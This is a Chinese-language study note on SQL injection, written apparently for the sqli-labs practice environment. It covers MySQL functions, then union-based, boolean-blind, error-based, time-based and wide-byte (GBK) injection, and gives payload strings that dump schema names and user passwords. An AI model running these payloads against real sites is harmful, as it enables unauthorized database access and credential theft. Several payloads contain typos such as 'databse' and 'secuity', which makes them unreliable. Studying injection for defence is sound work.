sql注入学习笔记：

一、Mysql基础知识

1、注释

单行注释 #

多行注释 /* */

单行注释 --空格  一般用-- +

内联注释 /*!5001*/   注释掉的内容只有高版本的mysql才会执行

2、语句

语句/函数	解释/功能	示例
union	用来拼接两个select语句，每个查询必须拥有相同列数，结果等于等一个select语句中的列名，默认选取不同值，允许重复值用union all	select name from pte union select age from pte;
order by x	根据第x列排序，默认升序	select * from pte order by 2;
limit x,y	从第x行开始显示y行	select * from pte limit 1,2;
user()	返回当前用户名	select user();
database()	返回当前所用数据库名	select database();
current_user()	返回当前用户名（可用来查看权限）	select current_user();
version()	返回数据库版本	select version();
@@datadir	返回数据库路径	select @@datadir();
count()	统计行数	select count(*) from pte
length ()	统计字符数	select length(name) from pte limit 0,1;
group_concat（）	将结果所有行连成字符串并以，间隔	select group_concat(name) from pte
substr(……x，y)	从x位开始截取y位	select substr(name,1,1) from pte limit 0,1;
ascii()	返回指定字符串最左侧字符的ascii值	select ascii(name) from pte limit 0,1;
sleep(x)	将程序暂停x秒	select sleep(5);
if(x,y,z)	x成立执行y，x不成立执行z	select if((select age from pte limit1,1)>0,sleep(5),database())

二、SQL注入

1、基本原理：数据库将要查询的内容当成代码执行

2、基于联合查询

联合查询union的步骤：

1. 判断网站是否存在注入，如果是纯静态（如何判断一个网站是不是伪静态 :在控制台console中输入alert(document.lastModified);查看到的时间为当前时间的话， 那么它很有可能是伪静态的， 如果看到的日期是以前的，那么它很可能就是静态页面了。）的就无法注入了
2. 判断网站的闭合字符‘|“|’），使用and条件判断、页面报错信息、能否执行某个函数。
3. 判断列数，判断前边表的列数，因为union是拼接后面sql语句想要查询的语句，使用order by函数判断列数。
4. 判断输入的语句在页面哪里显示→判断显示位
5. 查询数据库的版本，因为后面需要用到information，使用（select version（））查询版本。
6. 查询数据库名，使用database（）查询当前网站数据库名。
7. 查询当前数据库下所有表名，（因为不知道哪个表有被用到，所以查表名）（information_schema）
8. 查当前网站数据库下指定表中的所有列
9. 查当前网站数据库下指定表内指定列的字段内容

一.判断是否存在注入

二，求列数

http://127.0.0.1/sqli/sqli-labs-master/Less-1/?id=1%27%20order%20by%204%23

二分法

三、求显示位

实际为报错位

四、爆数据库版本号

id=-1' union select 1,2,version() -- +

五、爆当前数据库名

id=-1' union select 1,2,database() --+

查询所有数据库 id=-1‘ union select 1,2,group_concat(schema_name) from information_schema.schemata -- +

六、爆表名

id=-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'-- +

七、爆列名

id=-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' -- +

八、爆字段名

id=-1'union select 1,username,password from users where id=2 --+

2、布尔型盲注

特点：页面存在异常不反回保存信息

推测正确时，页面显示正常，不正确时，页面显示异常

步骤：

（1）求闭合字符

（2）求当前数据库名长度

（3）求当前数据库名对应的ascii值

（4）求表的数量

（5）求表名的长度

（6）求表名对应的ascii值

（7）求列的数量

（8）求列名的长度

（9）求列名对应的ASCII值

（10）求字段的数量

（11）求字段内容的长度

（12）求字段内容对应的ascii值 

 布尔型盲注实例：

（1）求闭合字符

（2）求当前数据库名的长度

（3）按位求数据库名的ascii码

（4）求表的数量

（5）求表名的长度

（6）求表名对应的ascii值

（7）求列的数量

（8）求列的长度

（9）求列名对应的ascii值

（10）求字段的数量

（11）求字段内容的长度

（12）求字段对应ascii值

3、基于报错信息的注入

（1）两个相关函数

extractvalue函数：

用于在数据库中取值，语法：extractvalue (XML_document, XPath_string)

updatexml函数：

用于更新文档中符合条件的节点的值，语法：updatexml(XML_document, XPath_string, new_value)

（2）原理：

将两个函数的XPath_string部分故意构造错误，在报错信息中即可得到想要查询的信息。

XPath_string部分中~和\是无法识别的，对应的十六进制分别是0x7c和0x5c，利用这个错误构造报错。 利用concat将~与语句连接成字符串。

and extractvalue（1，concat（0x7e，database（）））

and updatexml（1，concat（0x7e，databse（）），1） 

基于报错的模式：页面有报错信息时→输入敏感字符后页面有报错信息

基于报错的一般步骤：

库-表-列-字段

 和前面的不同之处：判断出是否存在字符以后用and进行连接

求库名：?id=1’and updatexml(1,concat(0x23,database()),1) --+

求表名：?id=1’and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema=’security’)),1) --+

求列名：?id=1’and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema=’security’and table_name=’user’)),1) --+

求字段内容：?id=1’and updatexml(1,concat(0x23,( select group_concat(username,0x23,password)fromsecurity.users)),1) --+

4、时间型盲注

特点：

页面不存在异常，无回显，无报错信息

原理：

利用条件语句，结合执行时间长短判断

if（布尔型语句，sleep（5），1）

当布尔型语句正确时，程序会暂停5秒，以此来判断行数或ascii码值。

5、宽字节注入

条件：数据库采用GBK字符集

原理：网站将特殊字符转译为反斜杠加特殊字符：addslashes或magic_quotes_gpc函数会将 单引号’ 双引号”  反斜杠\ 空字符null 等字符加上反斜线\。利用GBK编码，使反斜杠组成汉字即可屏蔽掉反斜杠\的作用，在GBK编码中反斜杠\对应的十六进制编码是5c， 在高位加入十六进制编码与5c组成汉字即可。可以加入df，十六进制df在URL编码中是%df，故加入%df，在数据库中会组成df5c，GBK编码中对应運，吃掉了反斜杠\。

注入步骤：在将\组合成汉字之后即可使用布尔或联合查询注入的方式进行注入。

附：

事件型注入和布尔型注入：

（1）区别时间型盲注和布尔型盲注的区别：时间型盲注 ：页面没有明显的报错信息，也没有正确错误的回显状态，只能通过页面刷新来判断语句能否执行 ；布尔型盲注 根据页面的正确错误状态进行判断（时间型就是只能根据页面浏览器执行语句刷新的长短来去判断，布尔是可以根据 布尔型盲注 根据页面的正确错误状态进行判断）

（2）不同的注入语句：

时间型盲注
1.求数据库名长度
and if(length(database())=8,sleep(5),1) -- -
2.求数据库名对应的ASCII值
and if(ascii(substr((select database()),1,1))=115,sleep(5),1) -- -
3.求表的数量
and if((select count(*) from information_schema.tables where table_schema='security')=4,sleep(5),1)-- -
4.求表名的长度
and if((select length(table_name) from information_schema.tables where table_shcema='secuity' limit 0,1)=6,sleep(5),1) -- -
5.求表名对应的ASCII值
and if(ascii(substr((select(table_name)from information_schema,tables where table_schema='security' limit 0,1),1,1))=101,sleep(5),1)-- -
6.求列的数量
and if((select count(column_name)from information_schema.columns where table_schema='security' and table_name='users')=3,sleep(5),1)-- -
7.

布尔型盲注
1.求闭合字符
2.求数据库名长度
and length(database())=8 %23
3.求当前数据库名对应的ASCII值
and ascii(substr(database(),1,1))=115 %23
4.求表的数量
and (select count(table_name) from information_schema.tables where table_schema='security')=4 
%23
5.求表名的长度
and (select length(table_name) from information_schema.tables where table_schema='security' limit 0,1)=6 %23
6.求表名对应的ASCII值
and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101 %23
7.求列的数量
and (select count(column_name) from information_schema.columns where table_schema='security' and table_name='users')=3 %23
8.求列名的长度
and (select length(column_name) from information_schema.columns where table_schema='security' and table_name='users' limit 0,1)<3 %23
9.求列名对应的ASCII值
and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))=105 %23
10.求字段的数量
and (select count(username) from security.users)=13 %23
11.求字段内容的长度
and (select length(username) from security.users limit 0,1)=4 %23
12.求字段对应的ASCII值
and ascii(substr((select concat(username,0x23,password) from security.users limit 0,1),1,1))=68 %23